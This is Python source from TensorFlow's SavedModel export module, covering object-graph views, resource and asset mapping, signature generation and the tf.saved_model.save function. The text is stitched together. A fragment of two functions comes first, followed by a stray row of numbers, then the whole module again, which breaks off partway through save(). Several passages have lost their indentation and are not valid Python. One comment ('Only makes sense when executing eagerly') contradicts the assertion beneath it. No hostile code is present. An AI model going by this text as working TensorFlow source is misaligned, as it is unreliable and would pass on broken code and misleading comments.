def _write_object_proto(obj, proto, asset_file_def_index):
  """Saves an object into SavedObject proto.

  Args:
    obj: A trackable object (asset, variable, function, constant, resource, or
      generic user object) to serialize.
    proto: The SavedObject proto to fill in.
    asset_file_def_index: Map from TrackableAsset to the index of its
      AssetFileDef in the MetaGraph's asset_file_def list.

  Raises:
    ValueError: If a variable's name does not end in ":0", since that suffix
      would not survive a save/restore round trip.
  """
  if isinstance(obj, tracking.TrackableAsset):
    proto.asset.SetInParent()
    proto.asset.asset_file_def_index = asset_file_def_index[obj]
  elif resource_variable_ops.is_resource_variable(obj):
    proto.variable.SetInParent()
    if not obj.name.endswith(":0"):
      # Fix: interpolate the variable name; the original format string was
      # never filled in, so the message literally contained "%s".
      raise ValueError(("Cowardly refusing to save variable %s because of"
                        " unexpected suffix which won't be restored.")
                       % obj.name)
    proto.variable.name = meta_graph._op_name(obj.name)  # pylint: disable=protected-access
    proto.variable.trainable = obj.trainable
    proto.variable.dtype = obj.dtype.as_datatype_enum
    proto.variable.synchronization = obj.synchronization.value
    proto.variable.aggregation = obj.aggregation.value
    proto.variable.shape.CopyFrom(obj.shape.as_proto())
  elif isinstance(obj, def_function.Function):
    proto.function.CopyFrom(
        function_serialization.serialize_function(obj))
  elif isinstance(obj, defun.ConcreteFunction):
    proto.bare_concrete_function.CopyFrom(
        function_serialization.serialize_bare_concrete_function(obj))
  elif isinstance(obj, _CapturedConstant):
    proto.constant.operation = obj.graph_tensor.op.name
  elif isinstance(obj, tracking.CapturableResource):
    proto.resource.device = obj._resource_device  # pylint: disable=protected-access
  else:
    registered_type_proto = revived_types.serialize(obj)
    if registered_type_proto is None:
      # Fallback for types with no matching registration
      registered_type_proto = saved_object_graph_pb2.SavedUserObject(
          identifier="_generic_user_object",
          version=versions_pb2.VersionDef(
              producer=1, min_consumer=1, bad_consumers=[]))
    proto.user_object.CopyFrom(registered_type_proto)
@tf_export("saved_model.save",
v1=["saved_model.save", "saved_model.experimental.save"])
def save(obj, export_dir, signatures=None):
# pylint: disable=line-too-long
"""Exports the Trackable object `obj` to [SavedModel format](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/saved_model/README.md).
Example usage:
```python
class Adder(tf.Module):
@tf.function(input_signature=[tf.TensorSpec(shape=None, dtype=tf.float32)])
def add(self, x):
return x + x + 1.
to_export = Adder()
tf.saved_model.save(to_export, '/tmp/adder')
```
The resulting SavedModel is then servable with an input named "x", its value
having any shape and dtype float32.
The optional `signatures` argument controls which methods in `obj` will be
available to programs which consume `SavedModel`s, for example serving
APIs. Python functions may be decorated with
`@tf.function(input_signature=...)` and passed as signatures directly, or
lazily with a call to `get_concrete_function` on the method decorated with
`@tf.function`.
If the `signatures` argument is omitted, `obj` will be searched for
`@tf.function`-decorated methods. If exactly one `@tf.function` is found, that
method will be used as the default signature for the SavedModel. This behavior
is expected to change in the future, when a corresponding
`tf.saved_model.load` symbol is added. At that point signatures will be
completely optional, and any `@tf.function` attached to `obj` or its
dependencies will be exported for use with `load`.
When invoking a signature in an exported SavedModel, `Tensor` arguments are
identified by name. These names will come from the Python function's argument
names by default. They may be overridden by specifying a `name=...` argument
in the corresponding `tf.TensorSpec` object. Explicit naming is required if
multiple `Tensor`s are passed through a single argument to the Python
function.
The outputs of functions used as `signatures` must either be flat lists, in
which case outputs will be numbered, or a dictionary mapping string keys to
`Tensor`, in which case the keys will be used to name outputs.
Signatures are available in objects returned by `tf.saved_model.load` as a
`.signatures` attribute. This is a reserved attribute: `tf.saved_model.save`
on an object with a custom `.signatures` attribute will raise an exception.
Since `tf.keras.Model` objects are also Trackable, this function can be
used to export Keras models. For example, exporting with a signature
specified:
```python
class Model(tf.keras.Model):
@tf.function(input_signature=[tf.TensorSpec(shape=[None], dtype=tf.string)])
def serve(self, serialized):
...
m = Model()
tf.saved_model.save(m, '/tmp/saved_model/')
```
Exporting from a function without a fixed signature:
```python
class Model(tf.keras.Model):
@tf.function
def call(self, x):
...
m = Model()
tf.saved_model.save(
m, '/tmp/saved_model/',
signatures=m.call.get_concrete_function(
tf.TensorSpec(shape=[None, 3], dtype=tf.float32, name="inp")))
```
`tf.keras.Model` instances constructed from inputs and outputs already have a
signature and so do not require a `@tf.function` decorator or a `signatures`
argument. If neither are specified, the model's forward pass is exported.
```python
x = input_layer.Input((4,), name="x")
y = core.Dense(5, name="out")(x)
model = training.Model(x, y)
tf.saved_model.save(model, '/tmp/saved_model/')
# The exported SavedModel takes "x" with shape [None, 4] and returns "out"
# with shape [None, 5]
```
Variables must be tracked by assigning them to an attribute of a tracked
object or to an attribute of `obj` directly. TensorFlow objects (e.g. layers
from `tf.keras.layers`, optimizers from `tf.train`) track their variables
automatically. This is the same tracking scheme that `tf.train.Checkpoint`
uses, and an exported `Checkpoint` object may be restored as a training
checkpoint by pointing `tf.train.Checkpoint.restore` to the SavedModel's
"variables/" subdirectory. Currently variables are the only stateful objects
supported by `tf.saved_model.save`, but others (e.g. tables) will be supported
in the future.
`tf.function` does not hard-code device annotations from outside the function
body, instead using the calling context's device. This means for example that
exporting a model which runs on a GPU and serving it on a CPU will generally
work, with some exceptions. `tf.device` annotations inside the body of the
function will be hard-coded in the exported model; this type of annotation is
discouraged. Device-specific operations, e.g. with "cuDNN" in the name or with
device-specific layouts, may cause issues. Currently a `DistributionStrategy`
is another exception: active distribution strategies will cause device
placements to be hard-coded in a function. Exporting a single-device
computation and importing under a `DistributionStrategy` is not currently
supported, but may be in the future.
SavedModels exported with `tf.saved_model.save` [strip default-valued
attributes](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/saved_model/README.md#stripping-default-valued-attributes)
automatically, which removes one source of incompatibilities when the consumer
of a SavedModel is running an older TensorFlow version than the
producer. There are however other sources of incompatibilities which are not
handled automatically, such as when the exported model contains operations
which the consumer does not have definitions for.
Args:
obj: A trackable object to export.
export_dir: A directory in which to write the SavedModel.
signatures: Optional, either a `tf.function` with an input signature
specified or the result of `f.get_concrete_function` on a
`@tf.function`-decorated function `f`, in which case `f` will be used to
generate a signature for the SavedModel under the default serving
signature key. `signatures` may also be a dictionary, in which case it
maps from signature keys to either `tf.function` instances with input
signatures or concrete functions. The keys of such a dictionary may be
arbitrary strings, but will typically be from the
`tf.saved_model.signature_constants` module.
Raises:
ValueError: If `obj` is not trackable.
@compatibility(eager)
Not well supported when graph building. From TensorFlow 1.x,
`tf.compat.v1.enable_eager_execution()` should run first. Calling
tf.saved_model.save in a loop when graph building from TensorFlow 1.x will
add new save operations to the default graph each iteration.
May not be called from within a function body.
@end_compatibility
"""
if ops.inside_function():
raise AssertionError(
"tf.saved_model.save is not supported inside a traced "
"@tf.function. Move the call to the outer eagerly-executed "
"context.")
# pylint: enable=line-too-long
if not isinstance(obj, base.Trackable):
raise ValueError(
"Expected a Trackable object for export, got {}.".format(obj))
checkpoint_graph_view = _AugmentedGraphView(obj)
if signatures is None:
signatures = signature_serialization.find_function_to_export(
checkpoint_graph_view)
signatures = signature_serialization.canonicalize_signatures(signatures)
signature_serialization.validate_saveable_view(checkpoint_graph_view)
signature_map = signature_serialization.create_signature_map(signatures)
checkpoint_graph_view.add_object(
parent_node=checkpoint_graph_view.root,
name_in_parent=signature_serialization.SIGNATURE_ATTRIBUTE_NAME,
subgraph_root=signature_map)
# Use _SaveableView to provide a frozen listing of properties and functions.
# Note we run this twice since, while constructing the view the first time
# there can be side effects of creating variables.
_ = _SaveableView(checkpoint_graph_view)
saveable_view = _SaveableView(checkpoint_graph_view)
# TODO(allenl): Factor out some subset of SavedModelBuilder which is 2.x
# compatible (no sessions) and share it with this export API rather than
# making a SavedModel proto and writing it directly.
saved_model = saved_model_pb2.SavedModel()
meta_graph_def = saved_model.meta_graphs.add()
object_saver = util.TrackableSaver(checkpoint_graph_view)
asset_info, exported_graph = _fill_meta_graph_def(
meta_graph_def, saveable_view, signatures)
saved_model.saved_model_schema_version = (
constants.SAVED_MODEL_SCHEMA_VERSION)
# So far we've just been generating protocol buffers with no I/O. Now we write
# the checkpoint, copy assets into the assets directory, and write out the
# SavedModel proto itself.
utils_impl.get_or_create_variables_dir(export_dir)
object_saver.save(utils_impl.get_variables_path(export_dir))
builder_impl.copy_assets_to_destination_dir(asset_info.asset_filename_map,
export_dir)
path = os.path.join(
compat.as_bytes(export_dir),
compat.as_bytes(constants.SAVED_MODEL_FILENAME_PB))
object_graph_proto = _serialize_object_graph(
saveable_view, asset_info.asset_index)
meta_graph_def.object_graph_def.CopyFrom(object_graph_proto)
file_io.write_string_to_file(path, saved_model.SerializeToString())
# Clean reference cycles so repeated export()s don't make work for the garbage
# collector. Before this point we need to keep references to captured
# constants in the saved graph.
ops.dismantle_graph(exported_graph)
| 46.092548 | 157 | 0.755535 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
from tensorflow.core.framework import versions_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import saved_model_pb2
from tensorflow.core.protobuf import saved_object_graph_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.saved_model import builder_impl
from tensorflow.python.saved_model import constants
from tensorflow.python.saved_model import function_serialization
from tensorflow.python.saved_model import nested_structure_coder
from tensorflow.python.saved_model import revived_types
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import signature_serialization
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.saved_model import utils_impl
from tensorflow.python.training.saving import functional_saver
from tensorflow.python.training.tracking import base
from tensorflow.python.training.tracking import graph_view
from tensorflow.python.training.tracking import object_identity
from tensorflow.python.training.tracking import tracking
from tensorflow.python.training.tracking import util
from tensorflow.python.util import compat
from tensorflow.python.util.tf_export import tf_export
# Dtypes whose tensors hold handles to external state (resources, variants);
# their values cannot be copied into the exported graph as constants.
_UNCOPIABLE_DTYPES = frozenset((dtypes.resource, dtypes.variant))
# Pairs an eager-mode captured constant with the copy created inside the
# exported graph, so the object graph proto can reference the graph-side copy.
_CapturedConstant = collections.namedtuple(
    "_CapturedConstant", ["eager_tensor", "graph_tensor"])
class _AugmentedGraphView(graph_view.ObjectGraphView):
  """ObjectGraphView that can attach extra children and cache functions.

  Used during export to add dependencies (e.g. the signature map) to the
  object graph without mutating the user's objects, and to compute each
  object's serializable functions only once.
  """

  def __init__(self, root):
    if (not context.executing_eagerly()
        and not ops.inside_function()):
      # Cache SaveableObjects only when graph building outside a function,
      # where reuse across save operations is safe.
      saveables_cache = object_identity.ObjectIdentityWeakKeyDictionary()
    else:
      saveables_cache = None
    super(_AugmentedGraphView, self).__init__(root, saveables_cache)
    # Object -> {name: dependency} mappings layered on top of the real graph.
    self._extra_dependencies = object_identity.ObjectIdentityDictionary()
    # Cache of each object's functions-for-serialization (computed once).
    self._functions = object_identity.ObjectIdentityDictionary()

  def add_object(self, parent_node, name_in_parent, subgraph_root):
    """Attaches `subgraph_root` as a dependency of `parent_node`."""
    self._extra_dependencies.setdefault(
        parent_node, {})[name_in_parent] = subgraph_root

  def list_dependencies(self, obj):
    """Yields `obj`'s dependencies; extras override on name collision."""
    extra_dependencies = self._extra_dependencies.get(obj, {})
    used_names = set()
    for name, dep in super(_AugmentedGraphView, self).list_dependencies(obj):
      used_names.add(name)
      if name in extra_dependencies:
        # An extra dependency with the same name shadows the original.
        yield base.TrackableReference(name, extra_dependencies[name])
      else:
        yield base.TrackableReference(name, dep)
    for name, dep in extra_dependencies.items():
      if name in used_names:
        continue
      yield base.TrackableReference(name, dep)

  def list_functions(self, obj):
    """Returns `obj`'s serializable functions, memoized per object."""
    obj_functions = self._functions.get(obj, None)
    if obj_functions is None:
      obj_functions = obj._list_functions_for_serialization()  # pylint: disable=protected-access
      self._functions[obj] = obj_functions
    return obj_functions
class _SaveableView(object):
  """Frozen view of the object graph used while exporting a SavedModel.

  Snapshots the trackable objects reachable from `checkpoint_view`, assigns
  each a node id, appends function objects as extra nodes, and collects the
  concrete functions to serialize.
  """

  def __init__(self, checkpoint_view):
    self.checkpoint_view = checkpoint_view
    trackable_objects, node_ids, slot_variables = (
        self.checkpoint_view.objects_ids_and_slot_variables())
    self.nodes = trackable_objects
    self.node_ids = node_ids
    # Filled in by map_resources(): captured tensor -> node id.
    self.captured_tensor_node_ids = object_identity.ObjectIdentityDictionary()
    self.slot_variables = slot_variables
    self.concrete_functions = []
    # Iterate over a copy: functions discovered below are appended to
    # self.nodes, and we must not re-traverse them here.
    nodes_without_functions = list(self.nodes)
    seen_function_names = set()
    for node in nodes_without_functions:
      for function in checkpoint_view.list_functions(node).values():
        if function not in self.node_ids:
          self.node_ids[function] = len(self.nodes)
          self.nodes.append(function)
        if isinstance(function, def_function.Function):
          # A tf.function may have several traced concrete functions.
          concrete_functions = (
              function._list_all_concrete_functions_for_serialization())
        else:
          concrete_functions = [function]
        for concrete_function in concrete_functions:
          if concrete_function.name not in seen_function_names:
            seen_function_names.add(concrete_function.name)
            self.concrete_functions.append(concrete_function)

  @property
  def root(self):
    # The root trackable is always the first node from the checkpoint view.
    return self.nodes[0]

  def fill_object_graph_proto(self, proto):
    """Populates `proto.nodes` with children/slot info for every node."""
    for node_id, node in enumerate(self.nodes):
      assert self.node_ids[node] == node_id
      object_proto = proto.nodes.add()
      object_proto.slot_variables.extend(self.slot_variables.get(node, ()))
      # Function and constant nodes have no children of their own.
      if isinstance(node, (def_function.Function, defun.ConcreteFunction,
                           _CapturedConstant)):
        continue
      for child in self.checkpoint_view.list_dependencies(node):
        child_proto = object_proto.children.add()
        child_proto.node_id = self.node_ids[child.ref]
        child_proto.local_name = child.name
      for local_name, ref_function in (
          self.checkpoint_view.list_functions(node).items()):
        child_proto = object_proto.children.add()
        child_proto.node_id = self.node_ids[ref_function]
        child_proto.local_name = local_name

  def map_resources(self):
    """Creates graph-mode copies of stateful objects for the export graph.

    Returns:
      A tuple of (object_map, resource_map, asset_info):
        object_map: original variable -> uninitialized graph copy.
        resource_map: original handle/path tensor -> graph-side tensor.
        asset_info: `_AssetInfo` describing assets discovered.
    """
    # Only makes sense when executing eagerly (the export graph is built
    # separately from the eager objects being copied).
    assert not context.executing_eagerly()
    object_map = object_identity.ObjectIdentityDictionary()
    resource_map = {}
    asset_info = _AssetInfo(
        asset_defs=[],
        asset_initializers_by_resource={},
        asset_filename_map={},
        asset_index={})
    for node_id, obj in enumerate(self.nodes):
      if isinstance(obj, tracking.CapturableResource):
        # Re-create the resource on its original device inside the new graph.
        with ops.device(obj._resource_device):
          new_resource = obj._create_resource()
        resource_map[obj.resource_handle] = new_resource
        self.captured_tensor_node_ids[obj.resource_handle] = node_id
      elif resource_variable_ops.is_resource_variable(obj):
        new_variable = resource_variable_ops.copy_to_graph_uninitialized(obj)
        object_map[obj] = new_variable
        resource_map[obj.handle] = new_variable.handle
        self.captured_tensor_node_ids[obj.handle] = node_id
      elif isinstance(obj, tracking.TrackableAsset):
        _process_asset(obj, asset_info, resource_map)
        self.captured_tensor_node_ids[obj.asset_path] = node_id
    # Any remaining copyable captured tensors become constant nodes.
    for concrete_function in self.concrete_functions:
      for capture in concrete_function.captured_inputs:
        if (tensor_util.is_tensor(capture)
            and capture.dtype not in _UNCOPIABLE_DTYPES
            and capture not in self.captured_tensor_node_ids):
          copied_tensor = constant_op.constant(
              tensor_util.constant_value(capture))
          node_id = len(self.nodes)
          node = _CapturedConstant(
              eager_tensor=capture, graph_tensor=copied_tensor)
          self.nodes.append(node)
          self.node_ids[capture] = node_id
          self.node_ids[node] = node_id
          self.captured_tensor_node_ids[capture] = node_id
          resource_map[capture] = copied_tensor
    return object_map, resource_map, asset_info
def _tensor_dict_to_tensorinfo(tensor_dict):
  """Converts each value of a {name: tensor} dict to a TensorInfo proto."""
  tensor_infos = {}
  for name, tensor in tensor_dict.items():
    tensor_infos[name] = utils_impl.build_tensor_info_internal(tensor)
  return tensor_infos
def _map_captures_to_created_tensors(
original_captures, resource_map):
export_captures = []
for exterior, interior in original_captures.items():
mapped_resource = resource_map.get(exterior, None)
if mapped_resource is None:
raise AssertionError(
("Tried to export a function which references untracked object {}."
"TensorFlow objects (e.g. tf.Variable) captured by functions must "
"be tracked by assigning them to an attribute of a tracked object "
"or assigned to an attribute of the main object directly.")
.format(interior))
export_captures.append(mapped_resource)
return export_captures
def _map_function_arguments_to_created_inputs(
    function_arguments, signature_key, function_name):
  """Creates exterior placeholders for a signature's function arguments.

  Args:
    function_arguments: Interior placeholders of the function's graph, each
      carrying a "_user_specified_name" op attribute.
    signature_key: The signature's key; used to prefix placeholder names.
    function_name: Name of the function, used in error messages.

  Returns:
    A tuple of (mapped_inputs, exterior_argument_placeholders):
      mapped_inputs: New placeholders in argument order, to feed the function.
      exterior_argument_placeholders: user-specified name -> new placeholder.

  Raises:
    ValueError: If two arguments map to the same user-specified name.
  """
  exterior_argument_placeholders = {}
  mapped_inputs = []
  for placeholder in function_arguments:
    # Recover the argument name the user gave when tracing the function.
    user_input_name = compat.as_str_any(
        placeholder.op.get_attr("_user_specified_name"))
    # If the internal placeholders for a function have names which were
    # uniquified by TensorFlow, then a single user-specified argument name
    # must refer to multiple Tensors. The resulting signatures would be
    # confusing to call. Instead, we throw an exception telling the user to
    # specify explicit names.
    if user_input_name != placeholder.op.name:
      # This should be unreachable, since concrete functions may not be
      # generated with non-unique argument names.
      raise ValueError(
          ("Got non-flat/non-unique argument names for SavedModel "
           "signature '{}': more than one argument to '{}' was named '{}'. "
           "Signatures have one Tensor per named input, so to have "
           "predictable names Python functions used to generate these "
           "signatures should avoid *args and Tensors in nested "
           "structures unless unique names are specified for each. Use "
           "tf.TensorSpec(..., name=...) to provide a name for a Tensor "
           "input.")
          .format(signature_key, compat.as_str_any(function_name),
                  user_input_name))
    # New exterior placeholder, named predictably from the signature key and
    # the user-specified argument name.
    arg_placeholder = array_ops.placeholder(
        shape=placeholder.shape,
        dtype=placeholder.dtype,
        name="{}_{}".format(signature_key, user_input_name))
    exterior_argument_placeholders[user_input_name] = arg_placeholder
    mapped_inputs.append(arg_placeholder)
  return mapped_inputs, exterior_argument_placeholders
def _call_function_with_mapped_captures(function, args, resource_map):
  """Calls `function` with `args`, remapping its captures via `resource_map`.

  Returns the function's structured outputs.
  """
  export_captures = _map_captures_to_created_tensors(
      function.graph.captures, resource_map)
  mapped_inputs = args + export_captures
  # Calls the function quite directly, since we have new captured resource
  # tensors we need to feed in which weren't part of the original function.
  outputs = function._build_call_outputs(  # pylint: disable=protected-access
      function._inference_function.call(context.context(), mapped_inputs))  # pylint: disable=protected-access
  return outputs
def _generate_signatures(signature_functions, resource_map):
  """Builds SignatureDef protos by re-calling each signature function.

  Args:
    signature_functions: signature key -> concrete function.
    resource_map: original tensor -> export-graph tensor, used to remap
      captures when calling the functions.

  Returns:
    A dict mapping each signature key to its SignatureDef proto.
  """
  signatures = {}
  # Sorted for deterministic placeholder naming across exports.
  for signature_key, function in sorted(signature_functions.items()):
    if function.graph.captures:
      # Captured tensors come last in graph.inputs; strip them to get only
      # the user-visible arguments.
      argument_inputs = function.graph.inputs[:-len(function.graph.captures)]
    else:
      argument_inputs = function.graph.inputs
    mapped_inputs, exterior_argument_placeholders = (
        _map_function_arguments_to_created_inputs(
            argument_inputs, signature_key, function.name))
    outputs = _call_function_with_mapped_captures(
        function, mapped_inputs, resource_map)
    signatures[signature_key] = signature_def_utils.build_signature_def(
        _tensor_dict_to_tensorinfo(exterior_argument_placeholders),
        _tensor_dict_to_tensorinfo(outputs),
        method_name=signature_constants.PREDICT_METHOD_NAME)
  return signatures
def _trace_resource_initializers(accessible_objects):
  """Returns concrete initializer functions for each CapturableResource."""
  resource_initializers = []

  def _wrap_initializer(obj):
    obj._initialize()  # pylint: disable=protected-access
    # Return a constant so the traced function has a (dummy) output.
    return constant_op.constant(1.)

  def _wrap_obj_initializer(obj):
    # Binds `obj` now; a bare lambda in the loop below would late-bind and
    # initialize only the last object.
    return lambda: _wrap_initializer(obj)

  for obj in accessible_objects:
    if isinstance(obj, tracking.CapturableResource):
      resource_initializers.append(def_function.function(
          _wrap_obj_initializer(obj),
          input_signature=[]).get_concrete_function())
  return resource_initializers
# Bookkeeping for asset files discovered while exporting.
_AssetInfo = collections.namedtuple(
    "_AssetInfo", [
        # List of AssetFileDef protocol buffers.
        "asset_defs",
        # Map from asset path tensors to their initializer ops.
        "asset_initializers_by_resource",
        # Map from destination asset filenames to original file paths.
        "asset_filename_map",
        # Map from TrackableAsset to the index of its AssetFileDef.
        "asset_index"])
def _process_asset(trackable_asset, asset_info, resource_map):
  """Registers one asset file: records its def and creates a path variable.

  Mutates `asset_info` (adding the AssetFileDef, filename mapping,
  initializer, and index) and `resource_map` (mapping the original path
  tensor to the new asset-path variable).
  """
  original_path_tensor = trackable_asset.asset_path
  original_path = tensor_util.constant_value(original_path_tensor)
  try:
    # numpy bytes scalar -> Python str; plain values pass through unchanged.
    original_path = str(original_path.astype(str))
  except AttributeError:
    pass
  path = builder_impl.get_asset_filename_to_add(
      asset_filepath=original_path,
      asset_filename_map=asset_info.asset_filename_map)
  # The loader feeds the restored asset path through this placeholder into a
  # variable, so functions can capture the path at load time.
  asset_path_initializer = array_ops.placeholder(
      shape=original_path_tensor.shape,
      dtype=dtypes.string,
      name="asset_path_initializer")
  asset_variable = resource_variable_ops.ResourceVariable(
      asset_path_initializer)
  asset_info.asset_filename_map[path] = original_path
  asset_def = meta_graph_pb2.AssetFileDef()
  asset_def.filename = path
  asset_def.tensor_info.name = asset_path_initializer.name
  asset_info.asset_defs.append(asset_def)
  asset_info.asset_initializers_by_resource[original_path_tensor] = (
      asset_variable.initializer)
  asset_info.asset_index[trackable_asset] = len(asset_info.asset_defs) - 1
  resource_map[original_path_tensor] = asset_variable
def _fill_meta_graph_def(meta_graph_def, saveable_view, signature_functions):
  """Builds the export graph and populates `meta_graph_def` in place.

  Args:
    meta_graph_def: MetaGraphDef proto to fill.
    saveable_view: `_SaveableView` describing the objects being exported.
    signature_functions: signature key -> concrete function.

  Returns:
    A tuple of (asset_info, exported_graph).
  """
  accessible_objects = saveable_view.nodes
  resource_initializer_functions = _trace_resource_initializers(
      accessible_objects)
  exported_graph = ops.Graph()
  resource_initializer_ops = []
  with exported_graph.as_default():
    # Copies variables/resources/assets into the export graph; must happen
    # inside the graph so the copies live there.
    object_map, resource_map, asset_info = saveable_view.map_resources()
    for resource_initializer_function in resource_initializer_functions:
      asset_dependencies = []
      for capture in resource_initializer_function.graph.external_captures:
        asset_initializer = asset_info.asset_initializers_by_resource.get(
            capture, None)
        if asset_initializer is not None:
          asset_dependencies.append(asset_initializer)
      # Asset-path variables must be initialized before any initializer that
      # captures them runs.
      with ops.control_dependencies(asset_dependencies):
        resource_initializer_ops.append(
            _call_function_with_mapped_captures(
                resource_initializer_function, [], resource_map))
    resource_initializer_ops.extend(
        asset_info.asset_initializers_by_resource.values())
    # Single no-op gathering all initializers, registered as the main op.
    with ops.control_dependencies(resource_initializer_ops):
      init_op = control_flow_ops.no_op()
    meta_graph_def.collection_def[constants.MAIN_OP_KEY].node_list.value.append(
        init_op.name)
    meta_graph_def.signature_def[constants.INIT_OP_SIGNATURE_KEY].CopyFrom(
        signature_def_utils.op_signature_def(
            init_op, constants.INIT_OP_SIGNATURE_KEY))
  # Saver over the graph-side copies of the variables.
  saver = functional_saver.MultiDeviceSaver(
      saveable_view.checkpoint_view.frozen_saveable_objects(
          object_map=object_map, to_graph=exported_graph))
  with exported_graph.as_default():
    signatures = _generate_signatures(signature_functions, resource_map)
    for concrete_function in saveable_view.concrete_functions:
      concrete_function.add_to_graph()
    saver_def = saver.to_proto()
    meta_graph_def.saver_def.CopyFrom(saver_def)
  graph_def = exported_graph.as_graph_def(add_shapes=True)
  meta_graph_def.graph_def.CopyFrom(graph_def)
  meta_graph_def.meta_info_def.tags.append(tag_constants.SERVING)
  meta_graph_def.meta_info_def.tensorflow_version = versions.__version__
  meta_graph_def.meta_info_def.tensorflow_git_version = (
      versions.__git_version__)
  # We currently always strip default attributes.
  meta_graph_def.meta_info_def.stripped_default_attrs = True
  meta_graph_def.meta_info_def.stripped_op_list.MergeFrom(
      meta_graph.stripped_op_list_for_graph(meta_graph_def.graph_def))
  meta_graph_def.asset_file_def.extend(asset_info.asset_defs)
  for signature_key, signature in signatures.items():
    meta_graph_def.signature_def[signature_key].CopyFrom(signature)
  meta_graph.strip_graph_default_valued_attrs(meta_graph_def)
  return asset_info, exported_graph
def _serialize_object_graph(saveable_view, asset_file_def_index):
  """Builds a SavedObjectGraph proto describing `saveable_view`."""
  object_graph = saved_object_graph_pb2.SavedObjectGraph()
  saveable_view.fill_object_graph_proto(object_graph)
  structure_coder = nested_structure_coder.StructureCoder()
  for fn in saveable_view.concrete_functions:
    fn_proto = function_serialization.serialize_concrete_function(
        fn, saveable_view.captured_tensor_node_ids, structure_coder)
    if fn_proto is None:
      continue
    object_graph.concrete_functions[fn.name].CopyFrom(fn_proto)
  for node, node_proto in zip(saveable_view.nodes, object_graph.nodes):
    _write_object_proto(node, node_proto, asset_file_def_index)
  return object_graph
def _write_object_proto(obj, proto, asset_file_def_index):
  """Fills one SavedObject proto according to `obj`'s type.

  Args:
    obj: The trackable object (asset, variable, function, constant, resource,
      or arbitrary user object) to describe.
    proto: The SavedObject proto to fill in place.
    asset_file_def_index: Map from TrackableAsset to its AssetFileDef index.

  Raises:
    ValueError: If a variable's name does not end with the ":0" suffix
      expected on restore.
  """
  if isinstance(obj, tracking.TrackableAsset):
    proto.asset.SetInParent()
    proto.asset.asset_file_def_index = asset_file_def_index[obj]
  elif resource_variable_ops.is_resource_variable(obj):
    proto.variable.SetInParent()
    if not obj.name.endswith(":0"):
      # Bug fix: the message contained an unformatted "%s"; format in the
      # variable name so the error identifies the offending variable.
      raise ValueError("Cowardly refusing to save variable %s because of"
                       " unexpected suffix which won't be restored." % obj.name)
    proto.variable.name = meta_graph._op_name(obj.name)  # pylint: disable=protected-access
    proto.variable.trainable = obj.trainable
    proto.variable.dtype = obj.dtype.as_datatype_enum
    proto.variable.synchronization = obj.synchronization.value
    proto.variable.aggregation = obj.aggregation.value
    proto.variable.shape.CopyFrom(obj.shape.as_proto())
  elif isinstance(obj, def_function.Function):
    proto.function.CopyFrom(
        function_serialization.serialize_function(obj))
  elif isinstance(obj, defun.ConcreteFunction):
    proto.bare_concrete_function.CopyFrom(
        function_serialization.serialize_bare_concrete_function(obj))
  elif isinstance(obj, _CapturedConstant):
    proto.constant.operation = obj.graph_tensor.op.name
  elif isinstance(obj, tracking.CapturableResource):
    proto.resource.device = obj._resource_device  # pylint: disable=protected-access
  else:
    registered_type_proto = revived_types.serialize(obj)
    if registered_type_proto is None:
      # Fallback for types with no matching registration.
      registered_type_proto = saved_object_graph_pb2.SavedUserObject(
          identifier="_generic_user_object",
          version=versions_pb2.VersionDef(
              producer=1, min_consumer=1, bad_consumers=[]))
    proto.user_object.CopyFrom(registered_type_proto)
@tf_export("saved_model.save",
           v1=["saved_model.save", "saved_model.experimental.save"])
def save(obj, export_dir, signatures=None):
  # pylint: disable=line-too-long
  """Exports the Trackable object `obj` to SavedModel format.

  Args:
    obj: A trackable object to export.
    export_dir: A directory in which to write the SavedModel.
    signatures: Optional, either a `tf.function` with an input signature
      specified or the result of `f.get_concrete_function` on a
      `@tf.function`-decorated function `f`, in which case `f` will be used to
      generate a signature for the SavedModel under the default serving
      signature key. `signatures` may also be a dictionary, in which case it
      maps from signature keys to either `tf.function` instances with input
      signatures or concrete functions. If `None`, a function to export is
      searched for on `obj`.

  Raises:
    ValueError: If `obj` is not trackable.
    AssertionError: If called from within a traced `@tf.function`.
  """
  if ops.inside_function():
    raise AssertionError(
        "tf.saved_model.save is not supported inside a traced "
        "@tf.function. Move the call to the outer eagerly-executed "
        "context.")
  # pylint: enable=line-too-long
  if not isinstance(obj, base.Trackable):
    raise ValueError(
        "Expected a Trackable object for export, got {}.".format(obj))
  checkpoint_graph_view = _AugmentedGraphView(obj)
  if signatures is None:
    signatures = signature_serialization.find_function_to_export(
        checkpoint_graph_view)
  signatures = signature_serialization.canonicalize_signatures(signatures)
  signature_serialization.validate_saveable_view(checkpoint_graph_view)
  signature_map = signature_serialization.create_signature_map(signatures)
  # Attach the signature map to the object graph under a reserved name.
  checkpoint_graph_view.add_object(
      parent_node=checkpoint_graph_view.root,
      name_in_parent=signature_serialization.SIGNATURE_ATTRIBUTE_NAME,
      subgraph_root=signature_map)
  # Use _SaveableView to provide a frozen listing of properties and functions.
  # Note we run this twice since, while constructing the view the first time
  # there can be side effects of creating variables.
  _ = _SaveableView(checkpoint_graph_view)
  saveable_view = _SaveableView(checkpoint_graph_view)
  # TODO(allenl): Factor out some subset of SavedModelBuilder which is 2.x
  # compatible (no sessions) and share it with this export API rather than
  # making a SavedModel proto and writing it directly.
  saved_model = saved_model_pb2.SavedModel()
  meta_graph_def = saved_model.meta_graphs.add()
  object_saver = util.TrackableSaver(checkpoint_graph_view)
  asset_info, exported_graph = _fill_meta_graph_def(
      meta_graph_def, saveable_view, signatures)
  saved_model.saved_model_schema_version = (
      constants.SAVED_MODEL_SCHEMA_VERSION)
  # So far we've just been generating protocol buffers with no I/O. Now we
  # write the checkpoint, copy assets into the assets directory, and write out
  # the SavedModel proto itself.
  utils_impl.get_or_create_variables_dir(export_dir)
  object_saver.save(utils_impl.get_variables_path(export_dir))
